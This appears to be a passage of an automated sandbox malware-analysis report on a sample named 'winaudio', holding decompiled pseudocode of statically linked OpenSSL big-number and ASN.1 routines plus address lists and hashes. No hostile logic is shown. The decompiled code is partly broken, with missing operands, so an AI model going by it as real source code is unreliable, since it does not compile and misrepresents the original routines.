								_t211 =  >=  ? _t327 : 0;
								_v52 = 0;
								_t327 =  >=  ? _t327 : 0;
								_v84 = _t323;
								_v48 = _t323;
								_v80 = 0;
								_v44 = 0;
								_t213 = _v24 + _v32 * 4;
								_v76 = 2;
								_t311 = _a16;
								_v56 = _t213;
								_v32 = _t213;
								_v92 = _t213 + _t323 * 4;
								_t215 =  *_t311;
								_v40 = 2;
								_v16 = _t327;
								__eflags =  *(_t215 + _t323 * 4 - 4);
								if( *(_t215 + _t323 * 4 - 4) >= 0) {
									_push(_a20);
									_t216 = _v12;
									_push(_t216);
									_push(_t216 + 4);
									_push(E002F9B20());
									_push( &_v56);
									_t220 = E0030AFE0(_t323);
									_t356 = _t359 + 0x14;
									__eflags = _t220;
									if(_t220 == 0) {
										goto L44;
									} else {
										goto L40;
									}
								} else {
									_t338 = _v20;
									 *_v32 =  ~( *_t215);
									_t323 = 1;
									_t265 = _t338 - 1;
									__eflags = _t338 - 1;
									if(_t338 > 1) {
										__eflags = _t265 - 8;
										if(_t265 >= 8) {
											_v32 =  *_t311;
											_t269 = _v56;
											_t299 = _t269 + 4;
											_v60 = _t299;
											_v64 = _t269 + _t338 * 4 + 0xfffffffc;
											_t272 = _v32;
											_v96 = _t272 + 4;
											_t316 = _a16;
											__eflags = _t299 - _t272 + _t338 * 4 + 0xfffffffc;
											_t295 = _v28;
											_t275 = _v64;
											if(_t299 > _t272 + _t338 * 4 + 0xfffffffc) {
												L27:
												__eflags = _v60 - _t316;
												if(_v60 > _t316) {
													L29:
													_t277 = _t338 - 0x00000001 & 0x80000007;
													__eflags = _t277;
													if(_t277 < 0) {
														_t277 = (_t277 - 0x00000001 | 0xfffffff8) + 1;
														__eflags = _t277;
													}
													asm("movups xmm1, [0x3bc720]");
													_t318 = _t338 - _t277;
													__eflags = _t318;
													do {
														asm("movups xmm0, [ebx+edx*4]");
														asm("pandn xmm0, xmm1");
														asm("movups [eax+edx*4], xmm0");
														asm("movups xmm0, [ebx+edx*4+0x10]");
														asm("pandn xmm0, xmm1");
														asm("movups [eax+edx*4+0x10], xmm0");
														_t323 = _t323 + 8;
														__eflags = _t323 - _t318;
													} while (_t323 < _t318);
													_t295 = _v28;
												} else {
													__eflags = _t275 - _t316;
													if(_t275 < _t316) {
														goto L29;
													}
												}
											} else {
												__eflags = _t275 - _v96;
												if(_t275 < _v96) {
													goto L27;
												}
											}
										}
										__eflags = _t323 - _t338;
										if(_t323 < _t338) {
											_t298 = _a16;
											do {
												 *(_v56 + _t323 * 4) =  !( *( *_t298 + _t323 * 4));
												_t323 = _t323 + 1;
												__eflags = _t323 - _t338;
											} while (_t323 < _t338);
											_t295 = _v28;
										}
									}
									_v52 = _t338;
									L40:
									_t334 = _a8;
									__eflags =  *(_t334 + 0xc);
									if( *(_t334 + 0xc) != 0) {
										L52:
										_push(_a20);
										_t327 = _v16;
										_push(_a16);
										_push(_a8);
										_push( &_v92);
										_push(0);
										_t222 = E003197D0(_t327);
										_t356 = _t356 + 0x14;
										__eflags = _t222;
										if(_t222 == 0) {
											goto L44;
										} else {
											_push(_a20);
											_t223 = _v12;
											_push(_t223);
											_push(_t223 + 4);
											_t225 =  &_v92;
											_push(_t225);
											_push(_t225);
											_t226 = E0030AFE0(_t323);
											_t356 = _t356 + 0x14;
											__eflags = _t226;
											if(_t226 == 0) {
												goto L44;
											} else {
												goto L54;
											}
										}
										goto L51;
									} else {
										_t258 = E002F9AD0(_t334, _a16);
										_t356 = _t356 + 8;
										__eflags = _t258;
										if(_t258 >= 0) {
											goto L52;
										} else {
											_push(_a20);
											_t259 = _v12;
											_push(_t259);
											_push(_t259 + 4);
											_push(_t334);
											_push( &_v92);
											_t262 = E0030AFE0(_t323);
											_t356 = _t356 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												L54:
												_t327 = _v16;
												_t228 = E00325AA0( &_v56, _v20, _v24, 0, _t295);
												_t356 = _t356 + 0x14;
												__eflags = _t228;
												if(_t228 == 0) {
													goto L44;
												} else {
													_t230 = E00325AA0( &_v92, _v20, _v24, 1, _t295);
													_t356 = _t356 + 0x14;
													__eflags = _t230;
													if(_t230 == 0) {
														goto L44;
													} else {
														__eflags = _t295 - 1;
														if(_t295 <= 1) {
															L64:
															_t345 = _t343 - 1;
															_t312 = 0;
															_t231 = _t345;
															asm("cdq");
															_t323 = _t231 % _t295;
															_t335 = _t231 % _t295;
															__eflags = _t335;
															if(_t335 >= 0) {
																_t297 = 0;
																__eflags = 0;
																do {
																	_t246 = E002F97C0(_t323, _a12, _t345);
																	_t356 = _t356 + 8;
																	_t345 = _t345 - 1;
																	_t335 = _t335 - 1;
																	__eflags = _t335;
																	_t297 = _t246 + _t297 * 2;
																} while (_t335 >= 0);
																_v60 = _t297;
																_t295 = _v28;
																_t312 = _v60;
															}
															_t327 = _v16;
															_push(_t295);
															_push(_t312);
															_push(_v24);
															_push(_v20);
															_push( &_v56);
															_t234 = E00325860(_t323);
															_t356 = _t356 + 0x14;
															__eflags = _t234;
															if(_t234 == 0) {
																goto L44;
															} else {
																__eflags = _t345;
																if(__eflags < 0) {
																	_t291 = _v12;
																	goto L80;
																} else {
																	do {
																		_t296 = 0;
																		_t336 = 0;
																		__eflags = 0;
																		while(1) {
																			_push(_a20);
																			_t237 =  &_v56;
																			_push(_v12);
																			_push(_t237);
																			_push(_t237);
																			_push(_t237);
																			_t238 = E0030AFE0(_t323);
																			_t356 = _t356 + 0x14;
																			__eflags = _t238;
																			if(_t238 == 0) {
																				goto L43;
																			}
																			_t239 = E002F97C0(_t323, _a12, _t345);
																			_t336 = _t336 + 1;
																			_t356 = _t356 + 8;
																			_t345 = _t345 - 1;
																			_t296 = _t239 + _t296 * 2;
																			_t240 = _v28;
																			__eflags = _t336 - _t240;
																			if(_t336 < _t240) {
																				continue;
																			} else {
																				_push(_t240);
																				_push(_t296);
																				_push(_v24);
																				_push(_v20);
																				_push( &_v92);
																				_t242 = E00325860(_t323);
																				_t291 = _v12;
																				_t356 = _t356 + 0x14;
																				__eflags = _t242;
																				if(_t242 == 0) {
																					L78:
																					_t327 = _v16;
																					goto L45;
																				} else {
																					_push(_a20);
																					_push(_t291);
																					_push( &_v92);
																					_t244 =  &_v56;
																					_push(_t244);
																					_push(_t244);
																					_t245 = E0030AFE0(_t323);
																					_t356 = _t356 + 0x14;
																					__eflags = _t245;
																					if(_t245 == 0) {
																						goto L78;
																					} else {
																						goto L76;
																					}
																				}
																			}
																			goto L51;
																		}
																		goto L43;
																		L76:
																		__eflags = _t345;
																	} while (__eflags >= 0);
																	L80:
																	_t327 = _v16;
																	_t236 = E0030ACD0(_t323, __eflags, _a4,  &_v56, _t291, _a20);
																	_t356 = _t356 + 0x10;
																	__eflags = _t236;
																	if(_t236 != 0) {
																		_v72 = 1;
																	}
																	goto L45;
																}
															}
														} else {
															_push(_a20);
															_t247 =  &_v92;
															_push(_v12);
															_push(_t247);
															_push(_t247);
															_push( &_v56);
															_t249 = E0030AFE0(_t323);
															_t356 = _t356 + 0x14;
															__eflags = _t249;
															if(_t249 == 0) {
																goto L44;
															} else {
																_t251 = E00325AA0( &_v56, _v20, _v24, 2, _t295);
																_t356 = _t356 + 0x14;
																__eflags = _t251;
																if(_t251 == 0) {
																	goto L44;
																} else {
																	_t337 = 3;
																	__eflags = _v68 - 3;
																	if(_v68 <= 3) {
																		goto L64;
																	} else {
																		while(1) {
																			_push(_a20);
																			_push(_v12);
																			_push( &_v56);
																			_push( &_v92);
																			_push( &_v56);
																			_t255 = E0030AFE0(_t323);
																			_t356 = _t356 + 0x14;
																			__eflags = _t255;
																			if(_t255 == 0) {
																				goto L43;
																			}
																			_t257 = E00325AA0( &_v56, _v20, _v24, _t337, _t295);
																			_t356 = _t356 + 0x14;
																			__eflags = _t257;
																			if(_t257 == 0) {
																				goto L43;
																			} else {
																				_t337 = _t337 + 1;
																				__eflags = _t337 - _v68;
																				if(_t337 < _v68) {
																					continue;
																				} else {
																					goto L64;
																				}
																			}
																			goto L51;
																		}
																		goto L43;
																	}
																}
															}
														}
													}
												}
												goto L51;
											} else {
												L43:
												_t327 = _v16;
												L44:
												_t291 = _v12;
											}
										}
									}
								}
							}
							L45:
							__eflags = _a24;
							if(_a24 == 0) {
								L46:
								__eflags = _t291;
								if(_t291 != 0) {
									E0030A960(_t323, _t291);
									_t356 = _t356 + 4;
								}
							}
							L48:
							_t199 = _v24;
							__eflags = _t199;
							if(_t199 != 0) {
								E002B1360(_t199, _v36);
								_t356 = _t356 + 8;
								__eflags = _t327;
								if(_t327 != 0) {
									E002ECA70(_t327);
									_t356 = _t356 + 4;
								}
							}
						}
						L51:
						E00300200(_a20);
						_pop(_t344);
						__eflags = _v8 ^ _t351;
						return E002E056D(_v8 ^ _t351, _t323, _t344);
					} else {
						if(_t289[1] != 1 ||  *( *_t289) != 1 || _t289[3] != 0) {
							E002F9A70(_t323, _a4, 1);
							_pop(_t348);
							__eflags = _v8 ^ _t351;
							return E002E056D(_v8 ^ _t351, _t323, _t348);
						} else {
							E002F9A70(_t323, _a4, 0);
							_pop(_t350);
							return E002E056D(_v8 ^ _t351, _t323, _t350);
						}
					}
				}
			}




































































































                        0x00324ad0
                        0x00324ad8
                        0x00324add
                        0x00324ae4
                        0x00324ae8
                        0x00324aec
                        0x00324aed
                        0x00324aef
                        0x00324af6
                        0x00324af9
                        0x00324afc
                        0x00324aff
                        0x00324b04
                        0x00325089
                        0x00325097
                        0x0032509c
                        0x003250a6
                        0x00324b15
                        0x00324b1d
                        0x00324b1f
                        0x00324b24
                        0x00324b83
                        0x00324b88
                        0x00324b8b
                        0x00324b8e
                        0x00324b90
                        0x00324b9c
                        0x00324b9e
                        0x00324ba1
                        0x00324ba3
                        0x00324ba9
                        0x00324bac
                        0x00324baf
                        0x00324bb0
                        0x00324bb5
                        0x00324bb8
                        0x00324bba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00324bba
                        0x00324b92
                        0x00324b92
                        0x00324bc0
                        0x00324bc0
                        0x00324bc6
                        0x00324bcf
                        0x00324bd5
                        0x00324bde
                        0x00324be1
                        0x00324bec
                        0x00324bef
                        0x00324bef
                        0x00324bf2
                        0x00324be3
                        0x00324be3
                        0x00324be3
                        0x00324bd7
                        0x00324bd7
                        0x00324bd7
                        0x00324bc8
                        0x00324bc8
                        0x00324bc8
                        0x00324bf9
                        0x00324c03
                        0x00324c06
                        0x00324c0a
                        0x00324c10
                        0x00324c13
                        0x00324c15
                        0x00324c18
                        0x00324c1a
                        0x00324c1d
                        0x00324c20
                        0x00324c23
                        0x00324c23
                        0x00324c26
                        0x00324c2c
                        0x00324c47
                        0x00324c49
                        0x00324c4c
                        0x00324c4e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00324c2e
                        0x00324c2e
                        0x00324c33
                        0x00324c54
                        0x00324c62
                        0x00324c65
                        0x00324c6f
                        0x00324c72
                        0x00324c75
                        0x00324c7c
                        0x00324c83
                        0x00324c86
                        0x00324c8d
                        0x00324c8f
                        0x00324c95
                        0x00324c98
                        0x00324c9f
                        0x00324ca6
                        0x00324ca9
                        0x00324cb0
                        0x00324cb3
                        0x00324cb6
                        0x00324cbc
                        0x00324cbf
                        0x00324cc1
                        0x00324cc8
                        0x00324ccb
                        0x00324cd0
                        0x00324dab
                        0x00324dae
                        0x00324db1
                        0x00324db5
                        0x00324dbb
                        0x00324dbf
                        0x00324dc0
                        0x00324dc5
                        0x00324dc8
                        0x00324dca
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00324cd6
                        0x00324cdd
                        0x00324ce0
                        0x00324ce2
                        0x00324ce7
                        0x00324cea
                        0x00324cec
                        0x00324cf2
                        0x00324cf5
                        0x00324cfd
                        0x00324d00
                        0x00324d03
                        0x00324d09
                        0x00324d0f
                        0x00324d12
                        0x00324d1b
                        0x00324d1e
                        0x00324d24
                        0x00324d26
                        0x00324d29
                        0x00324d2c
                        0x00324d33
                        0x00324d33
                        0x00324d36
                        0x00324d3c
                        0x00324d3f
                        0x00324d3f
                        0x00324d44
                        0x00324d4a
                        0x00324d4a
                        0x00324d4a
                        0x00324d4b
                        0x00324d57
                        0x00324d57
                        0x00324d60
                        0x00324d60
                        0x00324d67
                        0x00324d6b
                        0x00324d72
                        0x00324d77
                        0x00324d7b
                        0x00324d80
                        0x00324d83
                        0x00324d83
                        0x00324d87
                        0x00324d38
                        0x00324d38
                        0x00324d3a
                        0x00000000
                        0x00000000
                        0x00324d3a
                        0x00324d2e
                        0x00324d2e
                        0x00324d31
                        0x00000000
                        0x00000000
                        0x00324d31
                        0x00324d2c
                        0x00324d8a
                        0x00324d8c
                        0x00324d8e
                        0x00324d91
                        0x00324d9b
                        0x00324d9e
                        0x00324d9f
                        0x00324d9f
                        0x00324da3
                        0x00324da3
                        0x00324d8c
                        0x00324da6
                        0x00324dcc
                        0x00324dcc
                        0x00324dcf
                        0x00324dd3
                        0x00324e64
                        0x00324e64
                        0x00324e67
                        0x00324e6d
                        0x00324e70
                        0x00324e73
                        0x00324e74
                        0x00324e76
                        0x00324e7b
                        0x00324e7e
                        0x00324e80
                        0x00000000
                        0x00324e82
                        0x00324e82
                        0x00324e85
                        0x00324e88
                        0x00324e8c
                        0x00324e8d
                        0x00324e90
                        0x00324e91
                        0x00324e92
                        0x00324e97
                        0x00324e9a
                        0x00324e9c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00324e9c
                        0x00000000
                        0x00324dd9
                        0x00324ddd
                        0x00324de2
                        0x00324de5
                        0x00324de7
                        0x00000000
                        0x00324de9
                        0x00324de9
                        0x00324dec
                        0x00324def
                        0x00324df3
                        0x00324df7
                        0x00324df8
                        0x00324df9
                        0x00324dfe
                        0x00324e01
                        0x00324e03
                        0x00324ea2
                        0x00324ea2
                        0x00324eb2
                        0x00324eb7
                        0x00324eba
                        0x00324ebc
                        0x00000000
                        0x00324ec2
                        0x00324ecf
                        0x00324ed4
                        0x00324ed7
                        0x00324ed9
                        0x00000000
                        0x00324edf
                        0x00324edf
                        0x00324ee2
                        0x00324f74
                        0x00324f74
                        0x00324f75
                        0x00324f77
                        0x00324f79
                        0x00324f7a
                        0x00324f7c
                        0x00324f7e
                        0x00324f80
                        0x00324f82
                        0x00324f82
                        0x00324f84
                        0x00324f88
                        0x00324f8d
                        0x00324f90
                        0x00324f91
                        0x00324f91
                        0x00324f94
                        0x00324f94
                        0x00324f99
                        0x00324f9c
                        0x00324f9f
                        0x00324f9f
                        0x00324fa2
                        0x00324fa8
                        0x00324fa9
                        0x00324faa
                        0x00324fad
                        0x00324fb0
                        0x00324fb1
                        0x00324fb6
                        0x00324fb9
                        0x00324fbb
                        0x00000000
                        0x00324fc1
                        0x00324fc1
                        0x00324fc3
                        0x0032504a
                        0x00000000
                        0x00324fd0
                        0x00324fd0
                        0x00324fd0
                        0x00324fd2
                        0x00324fd2
                        0x00324fd4
                        0x00324fd4
                        0x00324fd7
                        0x00324fda
                        0x00324fdd
                        0x00324fde
                        0x00324fdf
                        0x00324fe0
                        0x00324fe5
                        0x00324fe8
                        0x00324fea
                        0x00000000
                        0x00000000
                        0x00324ff4
                        0x00324ff9
                        0x00324ffa
                        0x00324ffd
                        0x00324ffe
                        0x00325001
                        0x00325004
                        0x00325006
                        0x00000000
                        0x00325008
                        0x00325008
                        0x00325009
                        0x0032500a
                        0x00325010
                        0x00325013
                        0x00325014
                        0x00325019
                        0x0032501c
                        0x0032501f
                        0x00325021
                        0x00325042
                        0x00325042
                        0x00000000
                        0x00325023
                        0x00325023
                        0x00325029
                        0x0032502a
                        0x0032502b
                        0x0032502e
                        0x0032502f
                        0x00325030
                        0x00325035
                        0x00325038
                        0x0032503a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0032503a
                        0x00325021
                        0x00000000
                        0x00325006
                        0x00000000
                        0x0032503c
                        0x0032503c
                        0x0032503c
                        0x0032504d
                        0x0032505b
                        0x0032505d
                        0x00325062
                        0x00325065
                        0x00325067
                        0x0032506d
                        0x0032506d
                        0x00000000
                        0x00325067
                        0x00324fc3
                        0x00324ee8
                        0x00324ee8
                        0x00324eeb
                        0x00324eee
                        0x00324ef1
                        0x00324ef2
                        0x00324ef6
                        0x00324ef7
                        0x00324efc
                        0x00324eff
                        0x00324f01
                        0x00000000
                        0x00324f07
                        0x00324f14
                        0x00324f19
                        0x00324f1c
                        0x00324f1e
                        0x00000000
                        0x00324f24
                        0x00324f24
                        0x00324f29
                        0x00324f2c
                        0x00000000
                        0x00324f30
                        0x00324f30
                        0x00324f30
                        0x00324f36
                        0x00324f39
                        0x00324f3d
                        0x00324f41
                        0x00324f42
                        0x00324f47
                        0x00324f4a
                        0x00324f4c
                        0x00000000
                        0x00000000
                        0x00324f5e
                        0x00324f63
                        0x00324f66
                        0x00324f68
                        0x00000000
                        0x00324f6e
                        0x00324f6e
                        0x00324f6f
                        0x00324f72
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00324f72
                        0x00000000
                        0x00324f68
                        0x00000000
                        0x00324f30
                        0x00324f2c
                        0x00324f1e
                        0x00324f01
                        0x00324ee2
                        0x00324ed9
                        0x00000000
                        0x00324e09
                        0x00324e09
                        0x00324e09
                        0x00324e0c
                        0x00324e0c
                        0x00324e0c
                        0x00324e03
                        0x00324de7
                        0x00324dd3
                        0x00324cd0
                        0x00324e0f
                        0x00324e0f
                        0x00324e13
                        0x00324e15
                        0x00324e15
                        0x00324e17
                        0x00324e1a
                        0x00324e1f
                        0x00324e1f
                        0x00324e17
                        0x00324e22
                        0x00324e22
                        0x00324e25
                        0x00324e27
                        0x00324e2d
                        0x00324e32
                        0x00324e35
                        0x00324e37
                        0x00324e3a
                        0x00324e3f
                        0x00324e3f
                        0x00324e37
                        0x00324e27
                        0x00324e42
                        0x00324e45
                        0x00324e54
                        0x00324e59
                        0x00324e63
                        0x00324b26
                        0x00324b2a
                        0x00324b62
                        0x00324b70
                        0x00324b75
                        0x00324b7f
                        0x00324b38
                        0x00324b3f
                        0x00324b4d
                        0x00324b5c
                        0x00324b5c
                        0x00324b2a
                        0x00324b24

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: .\crypto\bn\bn_exp.c
                        • API String ID: 0-2073881893
                        • Opcode ID: 040cdf2be5ecfb0a32081ede8e878937733a0b1df92c3bd35d0b0a9bf5aa2dd4
                        • Instruction ID: 3ad36ecc094ac5ab80e558fc28aee86864907b0e0c243e35e4500c50ed94eaa2
                        • Opcode Fuzzy Hash: 040cdf2be5ecfb0a32081ede8e878937733a0b1df92c3bd35d0b0a9bf5aa2dd4
                        • Instruction Fuzzy Hash: 1402A271E0021AABDF12DF94EC81BEEB7B9FF44304F154025E915AB252E731EA54CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002FC020 Relevance: 1.6, Strings: 1, Instructions: 308COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 57%
                        			E002FC020(void* __ebx, void* __edi) {
				void* __esi;
				signed int _t68;
				intOrPtr _t73;
				signed int _t79;
				signed char _t81;
				signed int _t87;
				signed char _t94;
				void* _t96;
				char _t99;
				signed int _t100;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				signed int _t118;
				signed int _t119;
				signed int _t123;
				void* _t125;
				signed int _t126;
				void* _t131;
				signed int _t137;
				signed int _t141;
				signed int _t145;
				signed int _t151;
				signed int _t152;
				void* _t153;
				signed int _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				void* _t163;
				signed int _t166;
				signed int _t167;

				E00397C10();
				_t68 =  *0x3e1008; // 0x847b54ee
				 *(_t166 + 0x34) = _t68 ^ _t166;
				_t126 = 0;
				_t140 =  *(_t166 + 0x44);
				_t151 =  *(_t166 + 0x4c);
				_push(__edi);
				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x3c));
				_t145 = 0;
				 *(_t166 + 0xc) = 0;
				 *(_t166 + 8) = _t166 + 0x24;
				 *(_t166 + 0x18) = 0x18;
				if(_t151 != 0) {
					__eflags = _t151 - 0xffffffff;
					if(_t151 == 0xffffffff) {
						_t159 = _t140;
						_t125 = _t159 + 1;
						do {
							_t112 =  *_t159;
							_t159 = _t159 + 1;
							__eflags = _t112;
						} while (_t112 != 0);
						_t151 = _t159 - _t125;
						__eflags = _t151;
					}
					_t152 = _t151 - 1;
					_t73 =  *_t140 + 0xffffffd0;
					 *((intOrPtr*)(_t166 + 0x20)) = _t73;
					__eflags = _t73 - 2;
					if(__eflags > 0) {
						_push(0x6c);
						_push(".\\crypto\\asn1\\a_object.c");
						_push(0x7a);
						goto L76;
					} else {
						__eflags = _t152;
						if(__eflags > 0) {
							_t163 =  *(_t140 + 1);
							_t154 = _t152 - 1;
							_t141 = _t140 + 2;
							 *(_t166 + 0x58) = _t154;
							 *(_t166 + 0x1c) = _t141;
							__eflags = _t154;
							if(_t154 <= 0) {
								L74:
								_pop(_t155);
								__eflags =  *(_t166 + 0x34) ^ _t166;
								return E002E056D( *(_t166 + 0x34) ^ _t166, _t141, _t155);
							} else {
								while(1) {
									L11:
									__eflags = _t163 - 0x2e;
									if(_t163 == 0x2e) {
										goto L13;
									}
									__eflags = _t163 - 0x20;
									if(__eflags != 0) {
										_push(0x7a);
										_push(".\\crypto\\asn1\\a_object.c");
										_push(0x83);
										L63:
										_push(0x64);
										_push(0xd);
										E002E5840(_t141, _t145, __eflags);
										_t167 = _t166 + 0x14;
										L64:
										_t87 =  *(_t167 + 0x10);
										L65:
										__eflags = _t87 - _t167 + 0x2c;
										if(_t87 != _t167 + 0x2c) {
											E002ECA70(_t87);
											_t167 = _t167 + 4;
										}
										__eflags = _t145;
										if(_t145 == 0) {
											goto L77;
										} else {
											E002F9760(_t145);
											_pop(_t157);
											__eflags =  *(_t167 + 0x38) ^ _t167 + 0x00000004;
											return E002E056D( *(_t167 + 0x38) ^ _t167 + 0x00000004, _t141, _t157);
										}
									} else {
										goto L13;
									}
									goto L78;
									L13:
									_t79 = 0;
									_t118 = 0;
									 *(_t166 + 0x18) = 0;
									__eflags = _t154;
									if(_t154 <= 0) {
										L29:
										__eflags = _t126;
										if(_t126 != 0) {
											L37:
											_t156 = 0;
											__eflags =  *(_t166 + 0x18);
											if( *(_t166 + 0x18) == 0) {
												_t141 =  *(_t166 + 0x10);
												do {
													_t81 = _t118;
													_t118 = _t118 >> 7;
													 *(_t156 + _t141) = _t81 & 0x0000007f;
													_t156 = _t156 + 1;
													__eflags = _t118;
												} while (_t118 != 0);
												goto L50;
											} else {
												_t96 = E002F98F0(_t145);
												_t166 = _t166 + 4;
												_t34 = _t96 + 6; // 0x6
												_t135 = _t34;
												_t140 = (0x92492493 * _t34 >> 0x20) + _t135 >> 2;
												_t123 = ((0x92492493 * _t34 >> 0x20) + _t135 >> 2 >> 0x1f) + ((0x92492493 * _t34 >> 0x20) + _t135 >> 2);
												__eflags = _t123 -  *((intOrPtr*)(_t166 + 0x20));
												if(_t123 <=  *((intOrPtr*)(_t166 + 0x20))) {
													L42:
													__eflags = _t123;
													if(_t123 == 0) {
														_t141 =  *(_t166 + 0x10);
														goto L50;
													} else {
														while(1) {
															_t123 = _t123 - 1;
															_t99 = E00306FE0(_t140, _t145, 0x80);
															_t167 = _t166 + 8;
															__eflags = _t99 - 0xffffffff;
															if(_t99 == 0xffffffff) {
																goto L64;
															}
															_t140 =  *(_t167 + 0x10);
															 *((char*)(_t156 +  *(_t167 + 0x10))) = _t99;
															_t156 = _t156 + 1;
															__eflags = _t123;
															if(_t123 != 0) {
																continue;
															} else {
																L50:
																_t119 =  *(_t166 + 0x28);
																_t131 =  *(_t166 + 0x14);
																__eflags = _t119;
																if(_t119 == 0) {
																	_t126 = _t131 + _t156;
																	__eflags = _t126;
																	goto L57;
																} else {
																	__eflags = _t156 + _t131 -  *((intOrPtr*)(_t166 + 0x50));
																	if(__eflags > 0) {
																		_push(0xc3);
																		_push(".\\crypto\\asn1\\a_object.c");
																		_push(0x6b);
																		goto L63;
																	} else {
																		_t158 = _t156 - 1;
																		__eflags = _t158;
																		while(_t158 > 0) {
																			_t94 =  *((intOrPtr*)(_t158 + _t141));
																			_t158 = _t158 - 1;
																			 *(_t119 + _t131) = _t94 | 0x00000080;
																			_t131 = _t131 + 1;
																			__eflags = _t158;
																		}
																		 *(_t119 + _t131) =  *_t141;
																		_t126 = _t131 + 1;
																		L57:
																		_t154 =  *(_t166 + 0x58);
																		 *(_t166 + 0x14) = _t126;
																		__eflags = _t154;
																		if(_t154 <= 0) {
																			__eflags = _t141 - _t166 + 0x2c;
																			if(_t141 != _t166 + 0x2c) {
																				E002ECA70(_t141);
																				_t166 = _t166 + 4;
																			}
																			__eflags = _t145;
																			if(_t145 != 0) {
																				E002F9760(_t145);
																				_t166 = _t166 + 4;
																			}
																			_t126 =  *(_t166 + 0x14);
																			goto L74;
																		} else {
																			_t140 =  *(_t166 + 0x1c);
																			goto L11;
																		}
																	}
																}
															}
															goto L78;
														}
														goto L64;
													}
												} else {
													_t100 =  *(_t166 + 0x10);
													__eflags = _t100 - _t166 + 0x2c;
													if(_t100 != _t166 + 0x2c) {
														E002ECA70(_t100);
														_t166 = _t166 + 4;
													}
													 *((intOrPtr*)(_t166 + 0x2c)) = _t123 + 0x20;
													_t87 = E002ECAF0(_t123 + 0x20, ".\\crypto\\asn1\\a_object.c", 0xad);
													_t167 = _t166 + 0xc;
													 *(_t167 + 0x10) = _t87;
													__eflags = _t87;
													if(_t87 == 0) {
														goto L65;
													} else {
														goto L42;
													}
												}
											}
										} else {
											_t137 =  *(_t166 + 0x24);
											__eflags = _t137 - 2;
											if(_t137 >= 2) {
												L32:
												__eflags = _t79;
												_t103 = _t137 + _t137 * 4;
												if(_t79 == 0) {
													_t118 = _t118 + _t103 * 8;
													goto L37;
												} else {
													_t105 = E00306F30(_t140, _t145, _t103 << 3);
													_t167 = _t166 + 8;
													__eflags = _t105;
													if(_t105 == 0) {
														goto L64;
													} else {
														goto L37;
													}
												}
											} else {
												__eflags = _t118 - 0x28;
												if(__eflags >= 0) {
													_push(0x9b);
													_push(".\\crypto\\asn1\\a_object.c");
													_push(0x93);
													goto L63;
												} else {
													goto L32;
												}
											}
										}
									} else {
										while(1) {
											_t163 =  *_t140;
											_t154 = _t154 - 1;
											_t140 = _t140 + 1;
											 *(_t166 + 0x58) = _t154;
											 *(_t166 + 0x1c) = _t140;
											__eflags = _t163 - 0x20;
											if(_t163 == 0x20) {
												break;
											}
											__eflags = _t163 - 0x2e;
											if(_t163 == 0x2e) {
												break;
											} else {
												__eflags = _t163 - 0x30;
												if(__eflags < 0) {
													L60:
													_push(0x87);
													_push(".\\crypto\\asn1\\a_object.c");
													_push(0x82);
													goto L63;
												} else {
													__eflags = _t163 - 0x39;
													if(__eflags > 0) {
														goto L60;
													} else {
														__eflags = _t79;
														if(_t79 != 0) {
															L24:
															_t106 = E00307110(_t145, 0xa);
															_t167 = _t166 + 8;
															__eflags = _t106;
															if(_t106 == 0) {
																goto L64;
															} else {
																_t108 = E00306F30(_t140, _t145, _t163 - 0x30);
																_t167 = _t167 + 8;
																__eflags = _t108;
																if(_t108 == 0) {
																	goto L64;
																} else {
																	_t140 =  *(_t167 + 0x1c);
																	goto L27;
																}
															}
														} else {
															__eflags = _t118 - 0x19999991;
															if(_t118 < 0x19999991) {
																_t118 = (_t118 + _t118 * 4) * 2 - 0x30 + _t163;
																L27:
																_t79 =  *(_t167 + 0x18);
																__eflags = _t154;
																if(_t154 > 0) {
																	continue;
																} else {
																	break;
																}
															} else {
																 *(_t166 + 0x18) = 1;
																__eflags = _t145;
																if(_t145 != 0) {
																	L23:
																	_t110 = E002F9A70(_t140, _t145, _t118);
																	_t167 = _t166 + 8;
																	__eflags = _t110;
																	if(_t110 == 0) {
																		goto L64;
																	} else {
																		goto L24;
																	}
																} else {
																	_t145 = E002F9890(_t140, _t145);
																	__eflags = _t145;
																	if(_t145 == 0) {
																		goto L64;
																	} else {
																		goto L23;
																	}
																}
															}
														}
													}
												}
											}
											goto L78;
										}
										_t126 =  *(_t166 + 0x14);
										goto L29;
									}
									goto L78;
								}
							}
						} else {
							_push(0x71);
							_push(".\\crypto\\asn1\\a_object.c");
							_push(0x8a);
							L76:
							_push(0x64);
							_push(0xd);
							E002E5840(_t140, _t145, __eflags);
							_t167 = _t166 + 0x14;
							L77:
							_pop(_t153);
							__eflags =  *(_t167 + 0x44) ^ _t167;
							return E002E056D( *(_t167 + 0x44) ^ _t167, _t140, _t153);
						}
					}
				} else {
					_pop(_t160);
					return E002E056D( *(_t166 + 0x34) ^ _t166, _t140, _t160);
				}
				L78:
			}









































                        0x002fc025
